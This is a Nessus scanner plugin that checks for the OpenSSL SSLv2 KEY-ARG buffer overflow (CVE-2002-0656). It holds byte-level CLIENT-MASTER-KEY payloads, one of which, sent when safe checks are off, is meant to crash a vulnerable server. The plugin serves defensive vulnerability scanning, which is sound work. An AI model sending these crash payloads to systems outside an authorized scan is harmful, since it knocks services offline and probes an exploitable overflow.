nessus — OPENSSL_OVERFLOW_GENERIC_TEST.NASL — This script is Copyright (C) 2002-2020 Solar Eclipse / Renaud Deraison

OpenSSL < 0.9.6e / 0.9.7b3 Multiple Remote Vulnerabilities


The remote service seems to be using a version of OpenSSL that is older than 0.9.6e or 0.9.7-beta3.

Such versions are affected by a buffer overflow that may allow a remote attacker to execute arbitrary code on the host with the privileges of the application that links against the library. Note that this check does not read a version banner: it observes how the service's SSLv2 implementation handles an oversized KEY-ARG field in a CLIENT-MASTER-KEY message (CVE-2002-0656).

#TRUSTED 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
#
# (C) Tenable Network Security, Inc.
#

# Thanks to Solar Eclipse <[email protected]>, who did most
# of the work.
#
# Will incidentally cover CVE-2001-1141 and CVE-2000-0535
#


include("compat.inc");

# Plugin registration. Nessus runs the script once with 'description' set to
# collect the metadata below; the check itself is everything after this block.
if (description)
{
 script_id(11060);
 script_version("1.61");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

 # CVE-2002-0656 (oversized SSLv2 CLIENT-MASTER-KEY / KEY-ARG) is the flaw the
 # probes below actually exercise; the other IDs ride along on the same
 # upgrade advice (the header comment calls two of them "incidentally" covered).
 script_cve_id(
  "CVE-2000-0535",
  "CVE-2001-1141",
  "CVE-2002-0655",
  "CVE-2002-0656",
  "CVE-2002-0657",
  "CVE-2002-0659"
 );
 script_bugtraq_id(1340, 3004, 5361, 5362, 5363, 5364, 5366);
 script_xref(name:"SuSE", value:"SUSE-SA:2002:033");

 script_name(english:"OpenSSL < 0.9.6e / 0.9.7b3 Multiple Remote Vulnerabilities");
 script_summary(english:"Checks for the behavior of OpenSSL");

 script_set_attribute(attribute:"synopsis", value:
"The remote service uses a library that is affected by a buffer
overflow vulnerability.");
 # Wording says "version", but no banner is parsed anywhere in this script:
 # the verdict rests solely on how the SSLv2 server reacts to a KEY-ARG
 # longer than it should accept (see the probes at the bottom of the file).
 script_set_attribute(attribute:"description", value:
"The remote service seems to be using a version of OpenSSL that is
older than 0.9.6e or 0.9.7-beta3.

Such versions are affected by a buffer overflow that may allow an
attacker to execute arbitrary commands on the remote host with the
privileges of the application itself.");
 script_set_attribute(attribute:"solution", value:"Upgrade to OpenSSL version 0.9.6e / 0.9.7beta3 or later.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"exploit_framework_core", value:"true");
 script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
 script_set_attribute(attribute:"canvas_package", value:'CANVAS');

 script_set_attribute(attribute:"plugin_publication_date", value:"2002/08/05");
 script_set_attribute(attribute:"patch_publication_date", value:"2002/07/30");
 script_set_attribute(attribute:"vuln_publication_date", value:"2001/07/10");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:openssl:openssl");
 script_end_attributes();

 # ACT_MIXED_ATTACK: the script consults safe_checks() itself and only sends
 # the crash-inducing payload when safe checks are off.
 script_category(ACT_MIXED_ATTACK);
 script_copyright(english:"This script is Copyright (C) 2002-2020 Solar Eclipse / Renaud Deraison");
 script_family(english:"Gain a shell remotely");
 # ssl_supported_versions.nasl populates the SSL/Supported KB key that the
 # check reads via get_kb_item_or_exit() before picking ports.
 script_dependencies("ssl_supported_versions.nasl");
 script_require_keys("SSL/Supported");

 exit(0);
}

include("byte_func.inc");
include("ftp_func.inc");
include("global_settings.inc");
include("kerberos_func.inc");
include("ldap_func.inc");
include("misc_func.inc");
include("nntp_func.inc");
include("smtp_func.inc");
include("ssl_funcs.inc");
include("telnet2_func.inc");

# With safe checks on, the probe that remains (see below) can be fooled by
# non-OpenSSL SSLv2 stacks, so in that mode the script only runs when the
# user asked for paranoid reporting.
if (safe_checks())
{
  if (report_paranoia < 2) exit(0);
}

#------------------------------ Consts ----------------------#
# SSLv2 CLIENT-HELLO record (51 bytes on the wire). Byte offsets:
#   0-1   80 31        2-byte record header (high bit set, no padding),
#                      payload length 0x31 = 49
#   2     01           MSG-CLIENT-HELLO
#   3-4   00 02        CLIENT-VERSION: SSL 2.0
#   5-6   00 18        CIPHER-SPECS-LENGTH = 24 (8 specs x 3 bytes)
#   7-8   00 00        SESSION-ID-LENGTH = 0 (no resumption offered)
#   9-10  00 10        CHALLENGE-LENGTH = 16
#   11-34 eight 3-byte CIPHER-SPECs; the first one, 07 00 C0
#                      (DES_192_EDE3_CBC_WITH_MD5), is the CIPHER-KIND the
#                      CLIENT-MASTER-KEY payloads below select
#   35-50 16-byte CHALLENGE (fixed bytes, E4 BD ... 3D C0)
client_hello = raw_string(
0x80, 0x31, 0x01, 0x00,
0x02,  0x00, 0x18,0x00,
0x00,  0x00, 0x10,0x07,
0x00, 0xC0, 0x05, 0x00,
0x80, 0x03, 0x00, 0x80,
0x01, 0x00, 0x80, 0x08,
0x00, 0x80, 0x06, 0x00,
0x40, 0x04, 0x00, 0x80,
0x02, 0x00, 0x80, 0xE4,
0xBD, 0x00, 0x00, 0xA4,
0x41, 0xB6, 0x74, 0x71,
0x2B, 0x27, 0x95, 0x44,
0xC0, 0x3D, 0xC0);


# SSLv2 CLIENT-MASTER-KEY with an oversized KEY-ARG (92 bytes on the wire).
# This is the "safe" probe: it does not try to crash anything, it only
# checks whether the server tolerates the field. Byte offsets:
#   0-1   80 5A        2-byte record header, payload length 0x5A = 90
#   2     02           MSG-CLIENT-MASTER-KEY
#   3-5   07 00 C0     CIPHER-KIND: DES_192_EDE3_CBC_WITH_MD5 (from the hello)
#   6-7   00 00        CLEAR-KEY-LENGTH = 0
#   8-9   00 40        ENCRYPTED-KEY-LENGTH = 64
#   10-11 00 10        KEY-ARG-LENGTH = 16 -- the trigger. DES-EDE3-CBC needs
#                      an 8-byte IV here; per the CVE-2002-0656 advisory a
#                      fixed OpenSSL rejects a longer KEY-ARG, an unfixed
#                      one copies it into a fixed-size buffer.
#   12-75 64 bytes of "ENCRYPTED-KEY" (content looks arbitrary; only the
#                      lengths matter to this check)
#   76-91 16-byte KEY-ARG: 00 00 00 00 04 00 00 00 followed by 8 x 0x41
poison = raw_string(
0x80,0x5a,0x2,0x7,
0x0,0xc0,0x0,0x0,
0x0,0x40,0x0,0x10,
0x19,0x53,0xf,0x55,
0x5e,0xaa,0x68,0x71,
0x3,0x27,0x4,0x5a,
0x1f,0x5,0xea,0x33,
0x29,0x5b,0xb9,0x3f,
0x7d,0x28,0xe6,0x4c,
0xd4,0xb3,0x8e,0x36,
0x44,0xb5,0x86,0x6c,
0x6c,0x6,0xc1,0x5c,
0x45,0x73,0xb8,0x11,
0x55,0x23,0x3e,0x2a,
0x52,0xe0,0x52,0x30,
0xda,0xf8,0xee,0x15,
0x79,0xe1,0x3c,0x68,
0x36,0xd1,0x14,0x26,
0xae,0xd4,0x30,0x2,
0x0,0x0,0x0,0x0,
0x4,0x0,0x0,0x0,
0x41,0x41,0x41,0x41,
0x41,0x41,0x41,0x41);


# Same CLIENT-MASTER-KEY shape as 'poison' but with a 384-byte KEY-ARG
# (460 bytes on the wire). Only sent when safe checks are off: the intent is
# to crash a vulnerable server, and "no reply at all" is read as the crash.
# Byte offsets:
#   0-1    81 CA       2-byte record header, length ((0x81 & 0x7F) << 8) | 0xCA
#                      = 0x01CA = 458
#   2      02          MSG-CLIENT-MASTER-KEY
#   3-5    07 00 C0    CIPHER-KIND: DES_192_EDE3_CBC_WITH_MD5
#   6-7    00 00       CLEAR-KEY-LENGTH = 0
#   8-9    00 40       ENCRYPTED-KEY-LENGTH = 64
#   10-11  01 80       KEY-ARG-LENGTH = 384 (vs. the 8-byte IV DES-EDE3-CBC
#                      expects)
#   12-75  64 bytes of "ENCRYPTED-KEY" (arbitrary content)
#   76-459 384-byte KEY-ARG: 00 00 00 00 04 00 00 00 then 376 x 0x41
big_poison = raw_string(
0x81, 0xca, 0x2, 0x7,
0x0, 0xc0, 0x0, 0x0,
0x0, 0x40, 0x1, 0x80,
0xa4, 0x20, 0xb4, 0x44,
0xd, 0xe, 0x7c, 0x5,
0xc2, 0x21, 0x28, 0x4d,
0xd3, 0xab, 0x6b, 0x72,
0x10, 0xa3, 0x64, 0x7e,
0x9, 0x7e, 0xe8, 0x28,
0xe, 0x98, 0x5a, 0x5,
0x2f, 0x32, 0xbb, 0xa,
0x3c, 0xe0, 0x58, 0x5a,
0xc5, 0xf1, 0x91, 0x36,
0x1a, 0x27, 0x2c, 0x37,
0x4b, 0xc2, 0xd2, 0x49,
0x28, 0xc4, 0xf1, 0x76,
0x41, 0xe5, 0xa4, 0x2d,
0xe6, 0x9a, 0x55, 0x7e,
0x27, 0x38, 0x89, 0x13,
# KEY-ARG starts here (offset 76)
0x0, 0x0, 0x0, 0x0,
0x4, 0x0, 0x0, 0x0,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41);



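#-------- The check itself: one forked instance per SSL-capable port ---------#

# Caveat attached to a safe-checks finding. In that mode the script only
# observes whether the server keeps the handshake going after an oversized
# KEY-ARG; an SSLv2 stack that is not OpenSSL but tolerates the field would be
# reported just the same.
moderate_report =
"Note that since safe checks are enabled, this check might be fooled by
non-openssl implementations and produce a false positive.
In doubt, re-execute the scan without the safe checks";

# Populated by ssl_supported_versions.nasl (declared as a dependency above).
get_kb_item_or_exit("SSL/Supported");

port = get_ssl_ports(fork:TRUE);
if (isnull(port))
  exit(1, "The host does not appear to have any SSL-based services.");

if (!get_port_state(port))
  exit(0, "Port " + port + " is not open.");

# Performs one SSLv2 exchange against 'port': opens the connection (issuing
# the StartTLS command first where the port needs it), sends the CLIENT-HELLO
# defined above, requires an SSLv2 SERVER-HELLO in return, then sends 'payload'
# and returns up to 'reply_len' bytes of whatever comes back (an empty string
# when the peer sent nothing or hung up).
#
# The SERVER-HELLO requirement is what keeps a service that does not actually
# speak SSLv2 from being misjudged: a TLS-only server may answer the
# SSLv2-format hello with a TLS alert record, which is longer than the 5-byte
# SSLv2 ERROR the caller compares against and previously led to a false
# positive under safe checks. Any failure to get as far as the payload ends
# the script, since no verdict can be drawn from it.
function ssl2_probe(port, payload, reply_len)
{
  local_var soc, hello, sent, reply;

  soc = open_sock_ssl(port);
  if (!soc)
    exit(1, "open_sock_ssl() returned NULL for port " + port + ".");

  send(socket:soc, data:client_hello);
  hello = recv(socket:soc, length:8192);
  if (strlen(hello) < 3)
  {
    close(soc);
    exit(0, "The service on port " + port + " did not answer the SSLv2 CLIENT-HELLO.");
  }

  # An unpadded SSLv2 record (which a cleartext SERVER-HELLO is) carries a
  # 2-byte header with the high bit of the first byte set, followed by the
  # message type: 4 = MSG-SERVER-HELLO, 0 = MSG-ERROR. TLS records begin with
  # a content type of 0x14-0x17 (high bit clear) and so never pass this test.
  if (!(ord(hello[0]) & 0x80) || ord(hello[2]) != 4)
  {
    close(soc);
    exit(0, "The service on port " + port + " did not answer with an SSLv2 SERVER-HELLO.");
  }

  # A partial send leaves the server waiting for the rest of the record, so a
  # truncated probe cannot be judged by its (missing) reply.
  sent = send(socket:soc, data:payload);
  if (sent != strlen(payload))
  {
    close(soc);
    exit(0, "Could not send the whole SSLv2 probe to port " + port + ".");
  }

  reply = recv(socket:soc, length:reply_len);
  close(soc);
  return reply;
}

# Probe 1, used in both modes: CLIENT-MASTER-KEY with a 16-byte KEY-ARG.
# An SSLv2 ERROR record is exactly 5 bytes (2-byte header, MSG-ERROR, 2-byte
# error code), so anything longer means the server carried on with the
# handshake instead of refusing the oversized field.
reply = ssl2_probe(port:port, payload:poison, reply_len:10);
if (strlen(reply) <= 5)
  exit(0, "The service on port " + port + " did not accept the oversized SSLv2 KEY-ARG.");

if (safe_checks())
{
  # Not allowed to crash anything: report the tolerant behaviour alone, with
  # the caveat that it is not by itself proof of OpenSSL.
  security_hole(port:port, extra:moderate_report);
  exit(0);
}

# Probe 2, active mode only (ACT_MIXED_ATTACK): the same message with a
# 384-byte KEY-ARG, expected to crash a vulnerable server. No reply at all is
# taken as the crash; a server that still answers is not reported.
reply = ssl2_probe(port:port, payload:big_poison, reply_len:4096);
if (strlen(reply) == 0)
  security_hole(port:port);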